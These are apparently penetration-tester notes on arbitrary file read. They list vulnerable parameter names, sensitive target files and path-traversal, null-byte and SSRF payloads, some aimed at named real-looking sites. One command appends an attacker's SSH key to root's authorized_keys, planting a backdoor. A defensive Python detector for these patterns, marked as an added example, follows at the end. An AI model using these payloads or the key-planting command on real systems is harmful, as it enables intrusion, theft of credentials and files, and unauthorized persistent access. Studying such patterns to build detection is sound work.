Black Hole Notes 1 - Arbitrary File Read


Reading time: 16.01.18, pages 1-3

Sensitive parameters

&RealPath=
&FilePath=
&filepath=
&Path=
&path=
&inputFile=
&url=
&urls=
&Lang=
&dis=
&data=
&readfile=
&filep=
&src=
&menu=
META-INF
WEB-INF

Usable paths

/etc/shadow
/etc/passwd
/etc/hosts
/root/.bash_history (look for useradd, cd, mysql, ssh, nohup to find sensitive directories and files)
/etc/sysconfig/network-scripts/ifcfg-eth1
sed -i '/95_251/d' /root/.ssh/authorized_keys
url=file:///etc/passwd
url=http://10.29.5.24 (SSRF intranet probing)
/opt/nginx/conf/nginx.conf
file:///, gopher://, ftp://
/configs/database.php

Payload

  • http://...:8080/%c0%ae/WEB-INF/classes/com/huilan/application/action/PeopleBankAction.class
  • Combined with the truncation rule: /etc/passwd%00.jpg
  • ../../../../../../../../../../etc/passwd%00.jpg
  • http://www.zzvcom.com/cms/interface.jsp?time=41&data={readfile:%27/WEB-INF/classes/jdbc.properties%27}&jsoncallback=jsonp1442909681355
  • http://localhost:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
  • http://www.intime.com.cn:8000/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/windows/win.ini
  • echo ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEA0jrJeJfEURdpG/jddXzk3zZYxQfdHbgPC4QYh5qx0F2SS1Q+uCW6j2cM/SxqhocfgDYw1CTikNTlJ43tzv1ozpSRjmLH26aTxGDUnXsvyVLeWdrjPni1FoVffW+LM0rZVh7A74Vi1bDr7IP7XjSMQU157rye7++G+eWA1NhscIiiJ/pwUKAjPSiEx+8DXN8ccTDyWrSnD+NfUQXPO4dVFu2MR5/VjLO2yWsVMwenCPwItf5xEwGqU5KbzxeTOyDnYYLk7UF6lBYpSDZC9U3mNL1alYgNnIbmZGYg921KFh28BRptDewh5MRDKmfMUSqeZpIZ95Pq8lG1sObcjNzDew== root@szmlserver95_251.easou.com >>/root/.ssh/authorized_keys
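
Detection side of the lists above, as an added example that is not part of the original notes: a log-review helper that normalizes a request target and reports which of the noted patterns it contains (overlong-encoded dot, `%5c` separators, `%00` truncation, WEB-INF/META-INF access, `file://`-style schemes or internal addresses in the listed parameters). The rule names, function names and sample targets are constructed for illustration.

```python
import ipaddress
import re
from urllib.parse import unquote, urlsplit

# Parameter names from the "Sensitive parameters" list, lower-cased for comparison.
SENSITIVE_PARAMS = {"realpath", "filepath", "path", "inputfile", "url", "urls", "lang",
                    "dis", "data", "readfile", "filep", "src", "menu"}
OVERLONG_DOT = re.compile(r"%c0%ae", re.I)            # overlong UTF-8 encoding of "."
PRIVATE_DIR = re.compile(r"(^|/)(WEB-INF|META-INF)(/|$)", re.I)
SCHEME = re.compile(r"^(file|gopher|ftp)://", re.I)

def normalize(value):
    """Undo overlong dots, nested percent-encoding and backslash separators."""
    for _ in range(3):                                # bounded: catches double encoding
        decoded = unquote(OVERLONG_DOT.sub(".", value))
        if decoded == value:
            break
        value = decoded
    return value.replace("\\", "/")

def findings(target):
    """Return the sorted rule names that a request target (path + query) triggers."""
    parts, hits = urlsplit(target), set()
    pairs = (p.partition("=") for p in parts.query.split("&") if p)
    fields = [("", parts.path)] + [(n.lower(), v) for n, _, v in pairs]
    for name, raw in fields:
        value = normalize(raw)
        if OVERLONG_DOT.search(raw):
            hits.add("overlong-dot")
        if "\x00" in value:
            hits.add("null-byte")
        if ".." in value.split("/"):
            hits.add("traversal")
        if PRIVATE_DIR.search(value):
            hits.add("private-dir")
        if name in SENSITIVE_PARAMS:
            if SCHEME.match(value):
                hits.add("scheme-in-param")
            try:                                      # URL parameter pointing at an internal host
                if ipaddress.ip_address(urlsplit(value).hostname or "").is_private:
                    hits.add("internal-address")
            except ValueError:
                pass
    return sorted(hits)

# Constructed request targets in the shapes listed under "Payload".
SAMPLES = ("/theme/META-INF/%c0%ae%c0%ae/etc/passwd",
           "/get?FilePath=..%5c..%5cwindows/win.ini%00.jpg")
for sample in SAMPLES:
    print(sample, findings(sample))
```

Matching on the normalized value rather than the raw string is what lets one `traversal` rule cover the `../`, `..%5c`, `%c0%ae%c0%ae/` and double-encoded forms.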